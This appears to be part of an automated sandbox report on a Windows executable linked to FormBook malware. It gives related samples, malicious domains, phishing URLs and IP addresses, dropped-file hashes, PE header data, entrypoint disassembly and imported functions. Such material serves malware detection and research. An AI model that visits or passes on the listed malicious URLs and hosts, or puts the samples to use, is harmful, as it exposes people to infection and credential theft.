	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.186.58.31
	rQuotation.exe	Get hash	malicious	FormBook	Browse	192.186.58.31
www.aoivej.info	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.gern.dev	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	185.151.30.223
www.gern.dev	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	185.151.30.223
www.newbh.pro	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
www.newbh.pro	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	18.163.74.139
	http://www.jadavisinjurylawyers.com/	Get hash	malicious	Unknown	Browse	54.231.128.160
	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse	99.86.4.105
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	108.128.172.10
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	52.208.198.158
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.32.110.93
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	108.138.26.78
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
AMAZON-02US	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	18.163.74.139
	http://www.jadavisinjurylawyers.com/	Get hash	malicious	Unknown	Browse	54.231.128.160
	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse	99.86.4.105
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	108.128.172.10
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	52.208.198.158
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.32.110.93
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	108.138.26.78
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
VODANETInternationalIP-BackboneofVodafoneDE	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	6.elf	Get hash	malicious	Unknown	Browse	82.82.131.16
	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	1162-201.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	5.elf	Get hash	malicious	Unknown	Browse	88.79.50.180
	6.elf	Get hash	malicious	Unknown	Browse	178.10.231.77
	armv4l.elf	Get hash	malicious	Unknown	Browse	88.68.235.154
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	188.101.106.73
TELINEABA	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	belks.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.247
	belks.mpsl.elf	Get hash	malicious	Mirai	Browse	88.214.61.239
	na.elf	Get hash	malicious	Mirai	Browse	88.214.61.214
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102

Process:	C:\Windows\SysWOW64\relog.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut41C4.tmp

Download File

Process:	C:\Users\user\Desktop\k9OEsV37GE.exe
File Type:	Atari MSA archive data, -22729 sectors per track, starting track: 12621, ending track: 12888
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.990302179535324
Encrypted:	true
SSDEEP:	6144:J5cmw8qPsvGBtUn485zugmkyfhoRzdmG9DrhNeDdE:bpJiC43gGfuBdmG9DKdE
MD5:	3AE3D942276CE382E08918E7C0FB13FF
SHA1:	36E6D2E1FD6F4448DC421038633C30602278E5EE
SHA-256:	6CCFC4E3039818A2A28727514B089255F8E6EB87FEE15528D4DBA7E38D85C206
SHA-512:	0083FE6944A7FE63B93A40EA8282F0A5017AE4FE8C9F9B01ACF1FB4E8470EB441A40972B878764066AA4E2791D52D2D371D2A0AC911E73D1D46EF15203D3DFA5
Malicious:	false
Reputation:	low
Preview:	...7[71M2XJX..EC.77X71M6.JXE7ECU77X71M6XJXE7ECU77X71M6XJXE7E.U77V(.C6.C.d.D...c0^BmF%?7V(c6VY6XEmT=j0Ye;.s.d. Y</vH:OgU77X71MOYC.xW".hWP..Q.B...%$.-....-Q.P...y#2.e1TYpV?.XE7ECU77.r1MzYKX...#U77X71M6.JZD<DHU7g\71M6XJXE7EWU77H71MV\JXEwECE77X51M0XJXE7ECS77X71M6X*\E7GCU77X73Mv.JXU7ESU77X'1M&XJXE7ESU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXkC ;!77X..I6XZXE7.GU7'X71M6XJXE7ECU7.X7QM6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6X

C:\Users\user\AppData\Local\Temp\nondefinition

Download File

Process:	C:\Users\user\Desktop\k9OEsV37GE.exe
File Type:	Atari MSA archive data, -22729 sectors per track, starting track: 12621, ending track: 12888
Category:	modified
Size (bytes):	287232
Entropy (8bit):	7.990302179535324
Encrypted:	true
SSDEEP:	6144:J5cmw8qPsvGBtUn485zugmkyfhoRzdmG9DrhNeDdE:bpJiC43gGfuBdmG9DKdE
MD5:	3AE3D942276CE382E08918E7C0FB13FF
SHA1:	36E6D2E1FD6F4448DC421038633C30602278E5EE
SHA-256:	6CCFC4E3039818A2A28727514B089255F8E6EB87FEE15528D4DBA7E38D85C206
SHA-512:	0083FE6944A7FE63B93A40EA8282F0A5017AE4FE8C9F9B01ACF1FB4E8470EB441A40972B878764066AA4E2791D52D2D371D2A0AC911E73D1D46EF15203D3DFA5
Malicious:	false
Reputation:	low
Preview:	...7[71M2XJX..EC.77X71M6.JXE7ECU77X71M6XJXE7ECU77X71M6XJXE7E.U77V(.C6.C.d.D...c0^BmF%?7V(c6VY6XEmT=j0Ye;.s.d. Y</vH:OgU77X71MOYC.xW".hWP..Q.B...%$.-....-Q.P...y#2.e1TYpV?.XE7ECU77.r1MzYKX...#U77X71M6.JZD<DHU7g\71M6XJXE7EWU77H71MV\JXEwECE77X51M0XJXE7ECS77X71M6X*\E7GCU77X73Mv.JXU7ESU77X'1M&XJXE7ESU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXkC ;!77X..I6XZXE7.GU7'X71M6XJXE7ECU7.X7QM6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6XJXE7ECU77X71M6X

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0683981235122095
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	k9OEsV37GE.exe
File size:	1'293'824 bytes
MD5:	6ba61148828ceaf0251c9676e9d7c5fe
SHA1:	0e917cdeaa0947cea28d7812b2c8722b23f0dedc
SHA256:	dd60661e4cbb841dc66168c8d7724c93706a7afaefb71fbdbccbb46d9f4456f4
SHA512:	adb18bcbc1b39b862b71181ff71bd992bed04a315e946d2b82fba5bf9208e10d4d35586eda50e224a4e51ac3df2be7b314acbb717f593c809d43676a74f6999a
SSDEEP:	24576:Tu6J33O0c+JY5UZ+XC0kGso6FaMzl4K6dTTgxcNGEJuOnNnZIW0WY:9u0c++OCvkGs9FaMzlCdTtQJOnNnZI0Y
TLSH:	DE55BF62B3DDC360CB665173BF2AB7002E7B7C650570B45B2E983D3AB970161262DB63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	1c4c898989a581ab

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67519A23 [Thu Dec 5 12:18:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F0EA4ED21EAh
jmp 00007F0EA4EC4FB4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F0EA4EC513Ah
cmp edi, eax
jc 00007F0EA4EC549Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F0EA4EC5139h
rep movsb
jmp 00007F0EA4EC544Ch
cmp ecx, 00000080h
jc 00007F0EA4EC5304h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F0EA4EC5140h
bt dword ptr [004BE324h], 01h
jc 00007F0EA4EC5610h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F0EA4EC52DDh
test edi, 00000003h
jne 00007F0EA4EC52EEh
test esi, 00000003h
jne 00007F0EA4EC52CDh
bt edi, 02h
jnc 00007F0EA4EC513Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F0EA4EC5143h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F0EA4EC5195h
bt esi, 03h
jnc 00007F0EA4EC51E8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x73518	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13b000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x73518	0x73600	9ad50bfd7d42fc3d50eefbf067161ee8	False	0.8069495700162513	data	7.503486142720605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x13b000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0x16b70	Device independent bitmap graphic, 150 x 300 x 32, image size 90000	English	Great Britain	0.10503009458297506
RT_MENU	0xde340	0x50	data	English	Great Britain	0.9
RT_STRING	0xde390	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xde924	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xdefb0	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdf440	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdfa3c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe0098	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe0500	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe0658	0x599a1	data			1.000329692187385
RT_GROUP_ICON	0x139ffc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x13a010	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x13a024	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x13a038	0x14	data	English	Great Britain	1.25
RT_VERSION	0x13a04c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x13a128	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
